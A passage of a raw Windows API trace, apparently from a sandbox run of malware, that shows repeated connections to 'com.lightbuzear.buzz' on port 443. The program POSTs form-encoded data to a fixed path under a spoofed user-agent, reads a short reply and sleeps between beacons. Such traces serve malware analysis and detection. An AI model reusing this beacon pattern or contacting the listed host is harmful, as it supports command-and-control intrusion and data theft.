dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0192.912] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb898 [0192.912] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815040 | out: hHeap=0x4780000) returned 1 [0192.912] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814eb0 [0192.912] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb908 [0192.912] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815158 [0192.912] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb908 | out: hHeap=0x4780000) returned 1 [0192.912] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0192.913] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0192.913] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0192.913] FreeLibrary (hLibModule=0x71780000) returned 1 [0192.913] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815158 | out: hHeap=0x4780000) returned 1 [0192.913] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0192.913] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814ed8 [0192.913] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0192.913] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0192.913] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6a0 [0192.913] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0192.913] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce690 [0192.913] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0192.913] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6b0 [0192.914] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0192.914] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0192.914] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0192.914] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f910 [0192.914] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0192.914] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f8c8 [0192.914] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f910 | out: hHeap=0x4780000) returned 1 [0192.914] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0192.914] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f8c8 | out: hHeap=0x4780000) returned 1 [0192.914] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x481fa48 [0192.914] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814f00 [0192.914] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814f00 | out: hHeap=0x4780000) returned 1 [0192.914] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0192.914] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815040 [0192.914] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0192.914] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48150e0 [0192.914] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce740 [0192.914] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce600 [0192.914] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0192.915] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce620 [0192.915] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0192.915] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce640 [0192.915] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0192.915] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0192.915] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0192.915] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fa18 [0192.915] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0192.915] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f928 [0192.915] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa18 | out: hHeap=0x4780000) returned 1 [0192.915] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0192.915] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f928 | out: hHeap=0x4780000) returned 1 [0192.915] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x481f838 [0192.915] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815158 [0192.915] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815158 | out: hHeap=0x4780000) returned 1 [0192.915] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0192.915] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0192.916] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0192.916] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce690 [0192.916] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0192.916] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6b0 [0192.916] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0192.916] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0192.916] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0192.916] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce600 [0192.916] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0192.916] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f9e8 [0192.916] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0192.916] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f820 [0192.916] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f9e8 | out: hHeap=0x4780000) returned 1 [0192.916] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0192.916] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f820 | out: hHeap=0x4780000) returned 1 [0192.916] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4814f00 [0192.916] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0192.916] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb898 [0192.916] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814f00 | out: hHeap=0x4780000) returned 1 [0192.916] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814d48 [0192.916] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0192.916] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814f00 [0192.917] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0192.926] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0192.926] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0192.926] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0192.927] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814f00 | out: hHeap=0x4780000) returned 1 [0192.927] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce740 [0192.927] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0192.927] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0192.927] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6e0 [0192.927] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0192.927] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0192.927] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0192.927] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6b0 [0192.927] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0192.927] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f9e8 [0192.927] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0192.927] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f9a0 [0192.927] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f9e8 | out: hHeap=0x4780000) returned 1 [0192.927] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0192.927] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f9a0 | out: hHeap=0x4780000) returned 1 [0192.927] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48151d0 [0192.927] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0192.927] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0192.927] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48151d0 | out: hHeap=0x4780000) returned 1 [0192.927] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814f00 [0192.927] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0192.927] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814f28 [0192.928] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0192.928] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0192.928] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0192.928] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0194.087] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814f28 | out: hHeap=0x4780000) returned 1 [0194.087] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce640 [0194.087] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0194.088] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0194.088] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0194.088] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6d0 [0194.088] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0194.088] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5c0 [0194.088] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0194.088] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0194.088] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0194.088] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce620 [0194.088] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0194.088] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fad8 [0194.088] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0194.089] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fa30 [0194.089] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fad8 | out: hHeap=0x4780000) returned 1 [0194.089] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0194.089] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa30 | out: hHeap=0x4780000) returned 1 [0194.089] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4815158 [0194.089] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0194.089] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb978 [0194.089] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815158 | out: hHeap=0x4780000) returned 1 [0194.089] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48151d0 [0194.089] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0194.089] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815018 [0194.090] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0194.090] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb978 | out: hHeap=0x4780000) returned 1 [0194.090] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0194.090] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0194.090] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815018 | out: hHeap=0x4780000) returned 1 [0194.090] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0194.091] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6b0 [0194.091] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce710 [0194.091] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0194.091] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0194.091] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0194.091] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0194.091] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0194.091] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6f0 [0194.091] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0194.091] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f910 [0194.091] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0194.091] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f8b0 [0194.091] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f910 | out: hHeap=0x4780000) returned 1 [0194.091] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0194.091] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f8b0 | out: hHeap=0x4780000) returned 1 [0194.091] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4814e60 [0194.091] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0194.091] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0194.091] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814e60 | out: hHeap=0x4780000) returned 1 [0194.091] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814f28 [0194.091] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba20 [0194.091] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815018 [0194.092] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0194.092] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0194.092] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0194.092] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0194.093] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815018 | out: hHeap=0x4780000) returned 1 [0194.093] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0194.093] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0194.093] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0194.093] FreeLibrary (hLibModule=0x71570000) returned 1 [0194.093] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0194.093] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0194.094] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48150e0 | out: hHeap=0x4780000) returned 1 [0194.094] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815040 | out: hHeap=0x4780000) returned 1 [0194.095] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814ed8 | out: hHeap=0x4780000) returned 1 [0194.096] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814fa0 | out: hHeap=0x4780000) returned 1 [0194.096] Sleep (dwMilliseconds=0x2710) [0194.109] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6a0 [0194.109] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0194.109] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0194.109] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce740 [0194.109] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0194.109] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0194.109] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0194.109] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0194.109] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0194.109] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fa30 [0194.109] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0194.109] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f958 [0194.109] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa30 | out: hHeap=0x4780000) returned 1 [0194.109] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0194.109] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f958 | out: hHeap=0x4780000) returned 1 [0194.109] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x481f9e8 [0194.109] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814cf8 [0194.110] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814cf8 | out: hHeap=0x4780000) returned 1 [0194.110] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0194.110] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815040 [0194.110] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0194.111] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0194.111] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5f0 [0194.111] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0194.111] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0194.111] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0194.111] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0194.111] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0194.111] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce630 [0194.111] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0194.111] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f898 [0194.111] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0194.111] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f988 [0194.111] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f898 | out: hHeap=0x4780000) returned 1 [0194.111] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0194.111] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f988 | out: hHeap=0x4780000) returned 1 [0194.111] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4814fa0 [0194.111] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0194.111] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe80 [0194.111] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814fa0 | out: hHeap=0x4780000) returned 1 [0194.111] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814cf8 [0194.111] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0194.111] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814ed8 [0194.112] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0194.112] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0194.112] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0194.112] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0194.112] FreeLibrary (hLibModule=0x71780000) returned 1 [0194.112] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814ed8 | out: hHeap=0x4780000) returned 1 [0194.112] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0194.112] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815158 [0194.112] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0194.113] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0194.113] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0194.113] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0194.113] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce620 [0194.113] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0194.113] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0194.113] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: 